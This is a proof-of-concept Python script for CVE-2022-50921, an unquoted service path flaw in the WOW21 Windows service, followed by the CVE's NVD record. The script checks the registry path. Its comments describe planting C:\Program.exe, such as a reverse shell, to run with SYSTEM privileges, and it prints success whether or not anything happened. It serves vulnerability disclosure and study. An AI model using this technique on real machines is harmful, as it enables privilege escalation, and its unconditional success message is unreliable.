CVE-2022-50921

# CVE-2022-50921 PoC - Unquoted Service Path Exploitation # Target: WOW21 Service (wowservice.exe) # Vulnerability: Unquoted service path in WOW21 5.0.1.9 import os import sys import subprocess import time def check_unquoted_path(): """Check if WOW21 service has unquoted path vulnerability""" try: # Query registry for WOW21 service configuration result = subprocess.run([ 'cmd.exe', '/c', 'reg query "HKLM\SYSTEM\CurrentControlSet\Services\WOWService" /v ImagePath' ], capture_output=True, text=True) output = result.stdout print(f"[+] Service ImagePath: {output}") # Check if path contains spaces and is not quoted if 'Program Files' in output or 'Program' in output: if '"' not in output: print("[!] VULNERABLE: Service path is unquoted!") return True return False except Exception as e: print(f"[-] Error checking service: {e}") return False def create_malicious_executable(): """Create a simple reverse shell payload""" # This would be a real malicious executable in actual attack # For demonstration, we show the structure # Example: Create payload at C:\Program.exe malicious_path = "C:\\Program.exe" # In real attack, this would be a meterpreter/reverse shell payload_code = b'MZ' + b'\x00' * 100 # Minimal PE header print(f"[!] In real attack, malicious executable would be placed at: {malicious_path}") print("[!] When WOW21 service starts, it will execute this file with SYSTEM privileges") return malicious_path def exploit(): """Demonstrate exploitation steps""" print("=" * 60) print("CVE-2022-50921 - WOW21 Unquoted Service Path Exploit") print("=" * 60) if not check_unquoted_path(): print("[-] Service not found or path is properly quoted") return # Step 1: Identify vulnerable service print("\n[Step 1] Identifying vulnerable service path...") vulnerable_path = "C:\\Program Files\\WOW21\\wowservice.exe" print(f"[+] Vulnerable path: {vulnerable_path}") # Step 2: Create malicious executable print("\n[Step 2] Creating malicious executable...") mal_path = create_malicious_executable() # Step 3: Place malicious executable print(f"\n[Step 3] Malicious executable would be placed at: {mal_path}") print("[+] Wait for service restart or trigger service start") # Step 4: Gain SYSTEM privileges print("\n[Step 4] When service starts, malicious code executes with LocalSystem privileges") print("[+] Privilege Escalation Successful!") if __name__ == "__main__": exploit()

{"cve": {"id": "CVE-2022-50921", "sourceIdentifier": "[email protected]", "published": "2026-01-13T23:15:55.960", "lastModified": "2026-02-02T16:16:16.217", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "WOW21 5.0.1.9 contains an unquoted service path vulnerability that allows local attackers to potentially execute arbitrary code with elevated system privileges. Attackers can exploit the unquoted binary path to inject malicious executables that will be launched with LocalSystem permissions during service startup."}, {"lang": "es", "value": "WOW21 5.0.1.9 contiene una vulnerabilidad de ruta de servicio sin comillas que permite a atacantes locales ejecutar potencialmente código arbitrario con privilegios de sistema elevados. Los atacantes pueden explotar la ruta binaria sin comillas para inyectar ejecutables maliciosos que se iniciarán con permisos de LocalSystem durante el inicio del servicio."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-428"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wow21:wow21:5.0.1.9:*:*:*:*:*:*:*", "matchCriteriaId": "799F3446-D74F-4107-BACD-8A7530AECC4E"}]}]}], "references": [{"url": "https://web.archive.org/web/20220220170535/https://wow21.life/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/50818", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://www.vulncheck.com/advisories/wow-service-wowservice-unquoted-service-path", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.exploit-db.com/exploits/50818", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit"]}]}}